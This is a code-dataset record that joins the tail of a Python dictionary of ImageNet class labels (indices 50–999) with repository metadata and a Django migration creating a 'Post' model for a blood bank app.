50: 'American alligator, Alligator mississipiensis',
51: 'triceratops',
52: 'thunder snake, worm snake, Carphophis amoenus',
53: 'ringneck snake, ring-necked snake, ring snake',
54: 'hognose snake, puff adder, sand viper',
55: 'green snake, grass snake',
56: 'king snake, kingsnake',
57: 'garter snake, grass snake',
58: 'water snake',
59: 'vine snake',
60: 'night snake, Hypsiglena torquata',
61: 'boa constrictor, Constrictor constrictor',
62: 'rock python, rock snake, Python sebae',
63: 'Indian cobra, Naja naja',
64: 'green mamba',
65: 'sea snake',
66: 'horned viper, cerastes, sand viper, horned asp, Cerastes cornutus',
67: 'diamondback, diamondback rattlesnake, Crotalus adamanteus',
68: 'sidewinder, horned rattlesnake, Crotalus cerastes',
69: 'trilobite',
70: 'harvestman, daddy longlegs, Phalangium opilio',
71: 'scorpion',
72: 'black and gold garden spider, Argiope aurantia',
73: 'barn spider, Araneus cavaticus',
74: 'garden spider, Aranea diademata',
75: 'black widow, Latrodectus mactans',
76: 'tarantula',
77: 'wolf spider, hunting spider',
78: 'tick',
79: 'centipede',
80: 'black grouse',
81: 'ptarmigan',
82: 'ruffed grouse, partridge, Bonasa umbellus',
83: 'prairie chicken, prairie grouse, prairie fowl',
84: 'peacock',
85: 'quail',
86: 'partridge',
87: 'African grey, African gray, Psittacus erithacus',
88: 'macaw',
89: 'sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita',
90: 'lorikeet',
91: 'coucal',
92: 'bee eater',
93: 'hornbill',
94: 'hummingbird',
95: 'jacamar',
96: 'toucan',
97: 'drake',
98: 'red-breasted merganser, Mergus serrator',
99: 'goose',
100: 'black swan, Cygnus atratus',
101: 'tusker',
102: 'echidna, spiny anteater, anteater',
103: 'platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus',
104: 'wallaby, brush kangaroo',
105: 'koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus',
106: 'wombat',
107: 'jellyfish',
108: 'sea anemone, anemone',
109: 'brain coral',
110: 'flatworm, platyhelminth',
111: 'nematode, nematode worm, roundworm',
112: 'conch',
113: 'snail',
114: 'slug',
115: 'sea slug, nudibranch',
116: 'chiton, coat-of-mail shell, sea cradle, polyplacophore',
117: 'chambered nautilus, pearly nautilus, nautilus',
118: 'Dungeness crab, Cancer magister',
119: 'rock crab, Cancer irroratus',
120: 'fiddler crab',
121: 'king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica',
122: 'American lobster, Northern lobster, Maine lobster, Homarus americanus',
123: 'spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish',
124: 'crayfish, crawfish, crawdad, crawdaddy',
125: 'hermit crab',
126: 'isopod',
127: 'white stork, Ciconia ciconia',
128: 'black stork, Ciconia nigra',
129: 'spoonbill',
130: 'flamingo',
131: 'little blue heron, Egretta caerulea',
132: 'American egret, great white heron, Egretta albus',
133: 'bittern',
134: 'crane',
135: 'limpkin, Aramus pictus',
136: 'European gallinule, Porphyrio porphyrio',
137: 'American coot, marsh hen, mud hen, water hen, Fulica americana',
138: 'bustard',
139: 'ruddy turnstone, Arenaria interpres',
140: 'red-backed sandpiper, dunlin, Erolia alpina',
141: 'redshank, Tringa totanus',
142: 'dowitcher',
143: 'oystercatcher, oyster catcher',
144: 'pelican',
145: 'king penguin, Aptenodytes patagonica',
146: 'albatross, mollymawk',
147: 'grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus',
148: 'killer whale, killer, orca, grampus, sea wolf, Orcinus orca',
149: 'dugong, Dugong dugon',
150: 'sea lion',
151: 'Chihuahua',
152: 'Japanese spaniel',
153: 'Maltese dog, Maltese terrier, Maltese',
154: 'Pekinese, Pekingese, Peke',
155: 'Shih-Tzu',
156: 'Blenheim spaniel',
157: 'papillon',
158: 'toy terrier',
159: 'Rhodesian ridgeback',
160: 'Afghan hound, Afghan',
161: 'basset, basset hound',
162: 'beagle',
163: 'bloodhound, sleuthhound',
164: 'bluetick',
165: 'black-and-tan coonhound',
166: 'Walker hound, Walker foxhound',
167: 'English foxhound',
168: 'redbone',
169: 'borzoi, Russian wolfhound',
170: 'Irish wolfhound',
171: 'Italian greyhound',
172: 'whippet',
173: 'Ibizan hound, Ibizan Podenco',
174: 'Norwegian elkhound, elkhound',
175: 'otterhound, otter hound',
176: 'Saluki, gazelle hound',
177: 'Scottish deerhound, deerhound',
178: 'Weimaraner',
179: 'Staffordshire bullterrier, Staffordshire bull terrier',
180: 'American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier',
181: 'Bedlington terrier',
182: 'Border terrier',
183: 'Kerry blue terrier',
184: 'Irish terrier',
185: 'Norfolk terrier',
186: 'Norwich terrier',
187: 'Yorkshire terrier',
188: 'wire-haired fox terrier',
189: 'Lakeland terrier',
190: 'Sealyham terrier, Sealyham',
191: 'Airedale, Airedale terrier',
192: 'cairn, cairn terrier',
193: 'Australian terrier',
194: 'Dandie Dinmont, Dandie Dinmont terrier',
195: 'Boston bull, Boston terrier',
196: 'miniature schnauzer',
197: 'giant schnauzer',
198: 'standard schnauzer',
199: 'Scotch terrier, Scottish terrier, Scottie',
200: 'Tibetan terrier, chrysanthemum dog',
201: 'silky terrier, Sydney silky',
202: 'soft-coated wheaten terrier',
203: 'West Highland white terrier',
204: 'Lhasa, Lhasa apso',
205: 'flat-coated retriever',
206: 'curly-coated retriever',
207: 'golden retriever',
208: 'Labrador retriever',
209: 'Chesapeake Bay retriever',
210: 'German short-haired pointer',
211: 'vizsla, Hungarian pointer',
212: 'English setter',
213: 'Irish setter, red setter',
214: 'Gordon setter',
215: 'Brittany spaniel',
216: 'clumber, clumber spaniel',
217: 'English springer, English springer spaniel',
218: 'Welsh springer spaniel',
219: 'cocker spaniel, English cocker spaniel, cocker',
220: 'Sussex spaniel',
221: 'Irish water spaniel',
222: 'kuvasz',
223: 'schipperke',
224: 'groenendael',
225: 'malinois',
226: 'briard',
227: 'kelpie',
228: 'komondor',
229: 'Old English sheepdog, bobtail',
230: 'Shetland sheepdog, Shetland sheep dog, Shetland',
231: 'collie',
232: 'Border collie',
233: 'Bouvier des Flandres, Bouviers des Flandres',
234: 'Rottweiler',
235: 'German shepherd, German shepherd dog, German police dog, alsatian',
236: 'Doberman, Doberman pinscher',
237: 'miniature pinscher',
238: 'Greater Swiss Mountain dog',
239: 'Bernese mountain dog',
240: 'Appenzeller',
241: 'EntleBucher',
242: 'boxer',
243: 'bull mastiff',
244: 'Tibetan mastiff',
245: 'French bulldog',
246: 'Great Dane',
247: 'Saint Bernard, St Bernard',
248: 'Eskimo dog, husky',
249: 'malamute, malemute, Alaskan malamute',
250: 'Siberian husky',
251: 'dalmatian, coach dog, carriage dog',
252: 'affenpinscher, monkey pinscher, monkey dog',
253: 'basenji',
254: 'pug, pug-dog',
255: 'Leonberg',
256: 'Newfoundland, Newfoundland dog',
257: 'Great Pyrenees',
258: 'Samoyed, Samoyede',
259: 'Pomeranian',
260: 'chow, chow chow',
261: 'keeshond',
262: 'Brabancon griffon',
263: 'Pembroke, Pembroke Welsh corgi',
264: 'Cardigan, Cardigan Welsh corgi',
265: 'toy poodle',
266: 'miniature poodle',
267: 'standard poodle',
268: 'Mexican hairless',
269: 'timber wolf, grey wolf, gray wolf, Canis lupus',
270: 'white wolf, Arctic wolf, Canis lupus tundrarum',
271: 'red wolf, maned wolf, Canis rufus, Canis niger',
272: 'coyote, prairie wolf, brush wolf, Canis latrans',
273: 'dingo, warrigal, warragal, Canis dingo',
274: 'dhole, Cuon alpinus',
275: 'African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus',
276: 'hyena, hyaena',
277: 'red fox, Vulpes vulpes',
278: 'kit fox, Vulpes macrotis',
279: 'Arctic fox, white fox, Alopex lagopus',
280: 'grey fox, gray fox, Urocyon cinereoargenteus',
281: 'tabby, tabby cat',
282: 'tiger cat',
283: 'Persian cat',
284: 'Siamese cat, Siamese',
285: 'Egyptian cat',
286: 'cougar, puma, catamount, mountain lion, painter, panther, Felis concolor',
287: 'lynx, catamount',
288: 'leopard, Panthera pardus',
289: 'snow leopard, ounce, Panthera uncia',
290: 'jaguar, panther, Panthera onca, Felis onca',
291: 'lion, king of beasts, Panthera leo',
292: 'tiger, Panthera tigris',
293: 'cheetah, chetah, Acinonyx jubatus',
294: 'brown bear, bruin, Ursus arctos',
295: 'American black bear, black bear, Ursus americanus, Euarctos americanus',
296: 'ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus',
297: 'sloth bear, Melursus ursinus, Ursus ursinus',
298: 'mongoose',
299: 'meerkat, mierkat',
300: 'tiger beetle',
301: 'ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle',
302: 'ground beetle, carabid beetle',
303: 'long-horned beetle, longicorn, longicorn beetle',
304: 'leaf beetle, chrysomelid',
305: 'dung beetle',
306: 'rhinoceros beetle',
307: 'weevil',
308: 'fly',
309: 'bee',
310: 'ant, emmet, pismire',
311: 'grasshopper, hopper',
312: 'cricket',
313: 'walking stick, walkingstick, stick insect',
314: 'cockroach, roach',
315: 'mantis, mantid',
316: 'cicada, cicala',
317: 'leafhopper',
318: 'lacewing, lacewing fly',
319: "dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk",
320: 'damselfly',
321: 'admiral',
322: 'ringlet, ringlet butterfly',
323: 'monarch, monarch butterfly, milkweed butterfly, Danaus plexippus',
324: 'cabbage butterfly',
325: 'sulphur butterfly, sulfur butterfly',
326: 'lycaenid, lycaenid butterfly',
327: 'starfish, sea star',
328: 'sea urchin',
329: 'sea cucumber, holothurian',
330: 'wood rabbit, cottontail, cottontail rabbit',
331: 'hare',
332: 'Angora, Angora rabbit',
333: 'hamster',
334: 'porcupine, hedgehog',
335: 'fox squirrel, eastern fox squirrel, Sciurus niger',
336: 'marmot',
337: 'beaver',
338: 'guinea pig, Cavia cobaya',
339: 'sorrel',
340: 'zebra',
341: 'hog, pig, grunter, squealer, Sus scrofa',
342: 'wild boar, boar, Sus scrofa',
343: 'warthog',
344: 'hippopotamus, hippo, river horse, Hippopotamus amphibius',
345: 'ox',
346: 'water buffalo, water ox, Asiatic buffalo, Bubalus bubalis',
347: 'bison',
348: 'ram, tup',
349: 'bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis',
350: 'ibex, Capra ibex',
351: 'hartebeest',
352: 'impala, Aepyceros melampus',
353: 'gazelle',
354: 'Arabian camel, dromedary, Camelus dromedarius',
355: 'llama',
356: 'weasel',
357: 'mink',
358: 'polecat, fitch, foulmart, foumart, Mustela putorius',
359: 'black-footed ferret, ferret, Mustela nigripes',
360: 'otter',
361: 'skunk, polecat, wood pussy',
362: 'badger',
363: 'armadillo',
364: 'three-toed sloth, ai, Bradypus tridactylus',
365: 'orangutan, orang, orangutang, Pongo pygmaeus',
366: 'gorilla, Gorilla gorilla',
367: 'chimpanzee, chimp, Pan troglodytes',
368: 'gibbon, Hylobates lar',
369: 'siamang, Hylobates syndactylus, Symphalangus syndactylus',
370: 'guenon, guenon monkey',
371: 'patas, hussar monkey, Erythrocebus patas',
372: 'baboon',
373: 'macaque',
374: 'langur',
375: 'colobus, colobus monkey',
376: 'proboscis monkey, Nasalis larvatus',
377: 'marmoset',
378: 'capuchin, ringtail, Cebus capucinus',
379: 'howler monkey, howler',
380: 'titi, titi monkey',
381: 'spider monkey, Ateles geoffroyi',
382: 'squirrel monkey, Saimiri sciureus',
383: 'Madagascar cat, ring-tailed lemur, Lemur catta',
384: 'indri, indris, Indri indri, Indri brevicaudatus',
385: 'Indian elephant, Elephas maximus',
386: 'African elephant, Loxodonta africana',
387: 'lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens',
388: 'giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca',
389: 'barracouta, snoek',
390: 'eel',
391: 'coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch',
392: 'rock beauty, Holocanthus tricolor',
393: 'anemone fish',
394: 'sturgeon',
395: 'gar, garfish, garpike, billfish, Lepisosteus osseus',
396: 'lionfish',
397: 'puffer, pufferfish, blowfish, globefish',
398: 'abacus',
399: 'abaya',
400: "academic gown, academic robe, judge's robe",
401: 'accordion, piano accordion, squeeze box',
402: 'acoustic guitar',
403: 'aircraft carrier, carrier, flattop, attack aircraft carrier',
404: 'airliner',
405: 'airship, dirigible',
406: 'altar',
407: 'ambulance',
408: 'amphibian, amphibious vehicle',
409: 'analog clock',
410: 'apiary, bee house',
411: 'apron',
412: 'ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin',
413: 'assault rifle, assault gun',
414: 'backpack, back pack, knapsack, packsack, rucksack, haversack',
415: 'bakery, bakeshop, bakehouse',
416: 'balance beam, beam',
417: 'balloon',
418: 'ballpoint, ballpoint pen, ballpen, Biro',
419: 'Band Aid',
420: 'banjo',
421: 'bannister, banister, balustrade, balusters, handrail',
422: 'barbell',
423: 'barber chair',
424: 'barbershop',
425: 'barn',
426: 'barometer',
427: 'barrel, cask',
428: 'barrow, garden cart, lawn cart, wheelbarrow',
429: 'baseball',
430: 'basketball',
431: 'bassinet',
432: 'bassoon',
433: 'bathing cap, swimming cap',
434: 'bath towel',
435: 'bathtub, bathing tub, bath, tub',
436: 'beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon',
437: 'beacon, lighthouse, beacon light, pharos',
438: 'beaker',
439: 'bearskin, busby, shako',
440: 'beer bottle',
441: 'beer glass',
442: 'bell cote, bell cot',
443: 'bib',
444: 'bicycle-built-for-two, tandem bicycle, tandem',
445: 'bikini, two-piece',
446: 'binder, ring-binder',
447: 'binoculars, field glasses, opera glasses',
448: 'birdhouse',
449: 'boathouse',
450: 'bobsled, bobsleigh, bob',
451: 'bolo tie, bolo, bola tie, bola',
452: 'bonnet, poke bonnet',
453: 'bookcase',
454: 'bookshop, bookstore, bookstall',
455: 'bottlecap',
456: 'bow',
457: 'bow tie, bow-tie, bowtie',
458: 'brass, memorial tablet, plaque',
459: 'brassiere, bra, bandeau',
460: 'breakwater, groin, groyne, mole, bulwark, seawall, jetty',
461: 'breastplate, aegis, egis',
462: 'broom',
463: 'bucket, pail',
464: 'buckle',
465: 'bulletproof vest',
466: 'bullet train, bullet',
467: 'butcher shop, meat market',
468: 'cab, hack, taxi, taxicab',
469: 'caldron, cauldron',
470: 'candle, taper, wax light',
471: 'cannon',
472: 'canoe',
473: 'can opener, tin opener',
474: 'cardigan',
475: 'car mirror',
476: 'carousel, carrousel, merry-go-round, roundabout, whirligig',
477: "carpenter's kit, tool kit",
478: 'carton',
479: 'car wheel',
480: 'cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM',
481: 'cassette',
482: 'cassette player',
483: 'castle',
484: 'catamaran',
485: 'CD player',
486: 'cello, violoncello',
487: 'cellular telephone, cellular phone, cellphone, cell, mobile phone',
488: 'chain',
489: 'chainlink fence',
490: 'chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour',
491: 'chain saw, chainsaw',
492: 'chest',
493: 'chiffonier, commode',
494: 'chime, bell, gong',
495: 'china cabinet, china closet',
496: 'Christmas stocking',
497: 'church, church building',
498: 'cinema, movie theater, movie theatre, movie house, picture palace',
499: 'cleaver, meat cleaver, chopper',
500: 'cliff dwelling',
501: 'cloak',
502: 'clog, geta, patten, sabot',
503: 'cocktail shaker',
504: 'coffee mug',
505: 'coffeepot',
506: 'coil, spiral, volute, whorl, helix',
507: 'combination lock',
508: 'computer keyboard, keypad',
509: 'confectionery, confectionary, candy store',
510: 'container ship, containership, container vessel',
511: 'convertible',
512: 'corkscrew, bottle screw',
513: 'cornet, horn, trumpet, trump',
514: 'cowboy boot',
515: 'cowboy hat, ten-gallon hat',
516: 'cradle',
517: 'crane',
518: 'crash helmet',
519: 'crate',
520: 'crib, cot',
521: 'Crock Pot',
522: 'croquet ball',
523: 'crutch',
524: 'cuirass',
525: 'dam, dike, dyke',
526: 'desk',
527: 'desktop computer',
528: 'dial telephone, dial phone',
529: 'diaper, nappy, napkin',
530: 'digital clock',
531: 'digital watch',
532: 'dining table, board',
533: 'dishrag, dishcloth',
534: 'dishwasher, dish washer, dishwashing machine',
535: 'disk brake, disc brake',
536: 'dock, dockage, docking facility',
537: 'dogsled, dog sled, dog sleigh',
538: 'dome',
539: 'doormat, welcome mat',
540: 'drilling platform, offshore rig',
541: 'drum, membranophone, tympan',
542: 'drumstick',
543: 'dumbbell',
544: 'Dutch oven',
545: 'electric fan, blower',
546: 'electric guitar',
547: 'electric locomotive',
548: 'entertainment center',
549: 'envelope',
550: 'espresso maker',
551: 'face powder',
552: 'feather boa, boa',
553: 'file, file cabinet, filing cabinet',
554: 'fireboat',
555: 'fire engine, fire truck',
556: 'fire screen, fireguard',
557: 'flagpole, flagstaff',
558: 'flute, transverse flute',
559: 'folding chair',
560: 'football helmet',
561: 'forklift',
562: 'fountain',
563: 'fountain pen',
564: 'four-poster',
565: 'freight car',
566: 'French horn, horn',
567: 'frying pan, frypan, skillet',
568: 'fur coat',
569: 'garbage truck, dustcart',
570: 'gasmask, respirator, gas helmet',
571: 'gas pump, gasoline pump, petrol pump, island dispenser',
572: 'goblet',
573: 'go-kart',
574: 'golf ball',
575: 'golfcart, golf cart',
576: 'gondola',
577: 'gong, tam-tam',
578: 'gown',
579: 'grand piano, grand',
580: 'greenhouse, nursery, glasshouse',
581: 'grille, radiator grille',
582: 'grocery store, grocery, food market, market',
583: 'guillotine',
584: 'hair slide',
585: 'hair spray',
586: 'half track',
587: 'hammer',
588: 'hamper',
589: 'hand blower, blow dryer, blow drier, hair dryer, hair drier',
590: 'hand-held computer, hand-held microcomputer',
591: 'handkerchief, hankie, hanky, hankey',
592: 'hard disc, hard disk, fixed disk',
593: 'harmonica, mouth organ, harp, mouth harp',
594: 'harp',
595: 'harvester, reaper',
596: 'hatchet',
597: 'holster',
598: 'home theater, home theatre',
599: 'honeycomb',
600: 'hook, claw',
601: 'hoopskirt, crinoline',
602: 'horizontal bar, high bar',
603: 'horse cart, horse-cart',
604: 'hourglass',
605: 'iPod',
606: 'iron, smoothing iron',
607: "jack-o'-lantern",
608: 'jean, blue jean, denim',
609: 'jeep, landrover',
610: 'jersey, T-shirt, tee shirt',
611: 'jigsaw puzzle',
612: 'jinrikisha, ricksha, rickshaw',
613: 'joystick',
614: 'kimono',
615: 'knee pad',
616: 'knot',
617: 'lab coat, laboratory coat',
618: 'ladle',
619: 'lampshade, lamp shade',
620: 'laptop, laptop computer',
621: 'lawn mower, mower',
622: 'lens cap, lens cover',
623: 'letter opener, paper knife, paperknife',
624: 'library',
625: 'lifeboat',
626: 'lighter, light, igniter, ignitor',
627: 'limousine, limo',
628: 'liner, ocean liner',
629: 'lipstick, lip rouge',
630: 'Loafer',
631: 'lotion',
632: 'loudspeaker, speaker, speaker unit, loudspeaker system, speaker system',
633: "loupe, jeweler's loupe",
634: 'lumbermill, sawmill',
635: 'magnetic compass',
636: 'mailbag, postbag',
637: 'mailbox, letter box',
638: 'maillot',
639: 'maillot, tank suit',
640: 'manhole cover',
641: 'maraca',
642: 'marimba, xylophone',
643: 'mask',
644: 'matchstick',
645: 'maypole',
646: 'maze, labyrinth',
647: 'measuring cup',
648: 'medicine chest, medicine cabinet',
649: 'megalith, megalithic structure',
650: 'microphone, mike',
651: 'microwave, microwave oven',
652: 'military uniform',
653: 'milk can',
654: 'minibus',
655: 'miniskirt, mini',
656: 'minivan',
657: 'missile',
658: 'mitten',
659: 'mixing bowl',
660: 'mobile home, manufactured home',
661: 'Model T',
662: 'modem',
663: 'monastery',
664: 'monitor',
665: 'moped',
666: 'mortar',
667: 'mortarboard',
668: 'mosque',
669: 'mosquito net',
670: 'motor scooter, scooter',
671: 'mountain bike, all-terrain bike, off-roader',
672: 'mountain tent',
673: 'mouse, computer mouse',
674: 'mousetrap',
675: 'moving van',
676: 'muzzle',
677: 'nail',
678: 'neck brace',
679: 'necklace',
680: 'nipple',
681: 'notebook, notebook computer',
682: 'obelisk',
683: 'oboe, hautboy, hautbois',
684: 'ocarina, sweet potato',
685: 'odometer, hodometer, mileometer, milometer',
686: 'oil filter',
687: 'organ, pipe organ',
688: 'oscilloscope, scope, cathode-ray oscilloscope, CRO',
689: 'overskirt',
690: 'oxcart',
691: 'oxygen mask',
692: 'packet',
693: 'paddle, boat paddle',
694: 'paddlewheel, paddle wheel',
695: 'padlock',
696: 'paintbrush',
697: "pajama, pyjama, pj's, jammies",
698: 'palace',
699: 'panpipe, pandean pipe, syrinx',
700: 'paper towel',
701: 'parachute, chute',
702: 'parallel bars, bars',
703: 'park bench',
704: 'parking meter',
705: 'passenger car, coach, carriage',
706: 'patio, terrace',
707: 'pay-phone, pay-station',
708: 'pedestal, plinth, footstall',
709: 'pencil box, pencil case',
710: 'pencil sharpener',
711: 'perfume, essence',
712: 'Petri dish',
713: 'photocopier',
714: 'pick, plectrum, plectron',
715: 'pickelhaube',
716: 'picket fence, paling',
717: 'pickup, pickup truck',
718: 'pier',
719: 'piggy bank, penny bank',
720: 'pill bottle',
721: 'pillow',
722: 'ping-pong ball',
723: 'pinwheel',
724: 'pirate, pirate ship',
725: 'pitcher, ewer',
726: "plane, carpenter's plane, woodworking plane",
727: 'planetarium',
728: 'plastic bag',
729: 'plate rack',
730: 'plow, plough',
731: "plunger, plumber's helper",
732: 'Polaroid camera, Polaroid Land camera',
733: 'pole',
734: 'police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria',
735: 'poncho',
736: 'pool table, billiard table, snooker table',
737: 'pop bottle, soda bottle',
738: 'pot, flowerpot',
739: "potter's wheel",
740: 'power drill',
741: 'prayer rug, prayer mat',
742: 'printer',
743: 'prison, prison house',
744: 'projectile, missile',
745: 'projector',
746: 'puck, hockey puck',
747: 'punching bag, punch bag, punching ball, punchball',
748: 'purse',
749: 'quill, quill pen',
750: 'quilt, comforter, comfort, puff',
751: 'racer, race car, racing car',
752: 'racket, racquet',
753: 'radiator',
754: 'radio, wireless',
755: 'radio telescope, radio reflector',
756: 'rain barrel',
757: 'recreational vehicle, RV, R.V.',
758: 'reel',
759: 'reflex camera',
760: 'refrigerator, icebox',
761: 'remote control, remote',
762: 'restaurant, eating house, eating place, eatery',
763: 'revolver, six-gun, six-shooter',
764: 'rifle',
765: 'rocking chair, rocker',
766: 'rotisserie',
767: 'rubber eraser, rubber, pencil eraser',
768: 'rugby ball',
769: 'rule, ruler',
770: 'running shoe',
771: 'safe',
772: 'safety pin',
773: 'saltshaker, salt shaker',
774: 'sandal',
775: 'sarong',
776: 'sax, saxophone',
777: 'scabbard',
778: 'scale, weighing machine',
779: 'school bus',
780: 'schooner',
781: 'scoreboard',
782: 'screen, CRT screen',
783: 'screw',
784: 'screwdriver',
785: 'seat belt, seatbelt',
786: 'sewing machine',
787: 'shield, buckler',
788: 'shoe shop, shoe-shop, shoe store',
789: 'shoji',
790: 'shopping basket',
791: 'shopping cart',
792: 'shovel',
793: 'shower cap',
794: 'shower curtain',
795: 'ski',
796: 'ski mask',
797: 'sleeping bag',
798: 'slide rule, slipstick',
799: 'sliding door',
800: 'slot, one-armed bandit',
801: 'snorkel',
802: 'snowmobile',
803: 'snowplow, snowplough',
804: 'soap dispenser',
805: 'soccer ball',
806: 'sock',
807: 'solar dish, solar collector, solar furnace',
808: 'sombrero',
809: 'soup bowl',
810: 'space bar',
811: 'space heater',
812: 'space shuttle',
813: 'spatula',
814: 'speedboat',
815: "spider web, spider's web",
816: 'spindle',
817: 'sports car, sport car',
818: 'spotlight, spot',
819: 'stage',
820: 'steam locomotive',
821: 'steel arch bridge',
822: 'steel drum',
823: 'stethoscope',
824: 'stole',
825: 'stone wall',
826: 'stopwatch, stop watch',
827: 'stove',
828: 'strainer',
829: 'streetcar, tram, tramcar, trolley, trolley car',
830: 'stretcher',
831: 'studio couch, day bed',
832: 'stupa, tope',
833: 'submarine, pigboat, sub, U-boat',
834: 'suit, suit of clothes',
835: 'sundial',
836: 'sunglass',
837: 'sunglasses, dark glasses, shades',
838: 'sunscreen, sunblock, sun blocker',
839: 'suspension bridge',
840: 'swab, swob, mop',
841: 'sweatshirt',
842: 'swimming trunks, bathing trunks',
843: 'swing',
844: 'switch, electric switch, electrical switch',
845: 'syringe',
846: 'table lamp',
847: 'tank, army tank, armored combat vehicle, armoured combat vehicle',
848: 'tape player',
849: 'teapot',
850: 'teddy, teddy bear',
851: 'television, television system',
852: 'tennis ball',
853: 'thatch, thatched roof',
854: 'theater curtain, theatre curtain',
855: 'thimble',
856: 'thresher, thrasher, threshing machine',
857: 'throne',
858: 'tile roof',
859: 'toaster',
860: 'tobacco shop, tobacconist shop, tobacconist',
861: 'toilet seat',
862: 'torch',
863: 'totem pole',
864: 'tow truck, tow car, wrecker',
865: 'toyshop',
866: 'tractor',
867: 'trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi',
868: 'tray',
869: 'trench coat',
870: 'tricycle, trike, velocipede',
871: 'trimaran',
872: 'tripod',
873: 'triumphal arch',
874: 'trolleybus, trolley coach, trackless trolley',
875: 'trombone',
876: 'tub, vat',
877: 'turnstile',
878: 'typewriter keyboard',
879: 'umbrella',
880: 'unicycle, monocycle',
881: 'upright, upright piano',
882: 'vacuum, vacuum cleaner',
883: 'vase',
884: 'vault',
885: 'velvet',
886: 'vending machine',
887: 'vestment',
888: 'viaduct',
889: 'violin, fiddle',
890: 'volleyball',
891: 'waffle iron',
892: 'wall clock',
893: 'wallet, billfold, notecase, pocketbook',
894: 'wardrobe, closet, press',
895: 'warplane, military plane',
896: 'washbasin, handbasin, washbowl, lavabo, wash-hand basin',
897: 'washer, automatic washer, washing machine',
898: 'water bottle',
899: 'water jug',
900: 'water tower',
901: 'whiskey jug',
902: 'whistle',
903: 'wig',
904: 'window screen',
905: 'window shade',
906: 'Windsor tie',
907: 'wine bottle',
908: 'wing',
909: 'wok',
910: 'wooden spoon',
911: 'wool, woolen, woollen',
912: 'worm fence, snake fence, snake-rail fence, Virginia fence',
913: 'wreck',
914: 'yawl',
915: 'yurt',
916: 'web site, website, internet site, site',
917: 'comic book',
918: 'crossword puzzle, crossword',
919: 'street sign',
920: 'traffic light, traffic signal, stoplight',
921: 'book jacket, dust cover, dust jacket, dust wrapper',
922: 'menu',
923: 'plate',
924: 'guacamole',
925: 'consomme',
926: 'hot pot, hotpot',
927: 'trifle',
928: 'ice cream, icecream',
929: 'ice lolly, lolly, lollipop, popsicle',
930: 'French loaf',
931: 'bagel, beigel',
932: 'pretzel',
933: 'cheeseburger',
934: 'hotdog, hot dog, red hot',
935: 'mashed potato',
936: 'head cabbage',
937: 'broccoli',
938: 'cauliflower',
939: 'zucchini, courgette',
940: 'spaghetti squash',
941: 'acorn squash',
942: 'butternut squash',
943: 'cucumber, cuke',
944: 'artichoke, globe artichoke',
945: 'bell pepper',
946: 'cardoon',
947: 'mushroom',
948: 'Granny Smith',
949: 'strawberry',
950: 'orange',
951: 'lemon',
952: 'fig',
953: 'pineapple, ananas',
954: 'banana',
955: 'jackfruit, jak, jack',
956: 'custard apple',
957: 'pomegranate',
958: 'hay',
959: 'carbonara',
960: 'chocolate sauce, chocolate syrup',
961: 'dough',
962: 'meat loaf, meatloaf',
963: 'pizza, pizza pie',
964: 'potpie',
965: 'burrito',
966: 'red wine',
967: 'espresso',
968: 'cup',
969: 'eggnog',
970: 'alp',
971: 'bubble',
972: 'cliff, drop, drop-off',
973: 'coral reef',
974: 'geyser',
975: 'lakeside, lakeshore',
976: 'promontory, headland, head, foreland',
977: 'sandbar, sand bar',
978: 'seashore, coast, seacoast, sea-coast',
979: 'valley, vale',
980: 'volcano',
981: 'ballplayer, baseball player',
982: 'groom, bridegroom',
983: 'scuba diver',
984: 'rapeseed',
985: 'daisy',
986: "yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum",
987: 'corn',
988: 'acorn',
989: 'hip, rose hip, rosehip',
990: 'buckeye, horse chestnut, conker',
991: 'coral fungus',
992: 'agaric',
993: 'gyromitra',
994: 'stinkhorn, carrion fungus',
995: 'earthstar',
996: 'hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa',
997: 'bolete',
998: 'ear, spike, capitulum',
999: 'toilet tissue, toilet paper, bathroom tissue'}
|
[
"46166076+Tunoc@users.noreply.github.com"
] |
46166076+Tunoc@users.noreply.github.com
|
b1da81e45980e885470ba6b0e3d6abd5ee4b893f
|
950eb2c41a9835c1fe0daffd8856039b2535072f
|
/index/migrations/0001_initial.py
|
9b198c2122bf3b192b5f306be1632ded398ccd96
|
[] |
no_license
|
shazolKh/bloodbank
|
21f701e77c812b007eac6dea3e3520cf5a268f54
|
905479c57c68a7e872fac05ce0f5514ec01b02d6
|
refs/heads/master
| 2023-06-04T14:22:36.849281
| 2021-06-19T08:19:20
| 2021-06-19T08:19:20
| 331,898,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,044
|
py
|
# Generated by Django 3.1.1 on 2021-02-22 17:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('blood_group', models.CharField(max_length=5)),
('location', models.CharField(max_length=100)),
('hospital', models.CharField(max_length=100)),
('contact', models.CharField(max_length=30)),
('managed', models.CharField(max_length=5)),
('details', models.TextField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
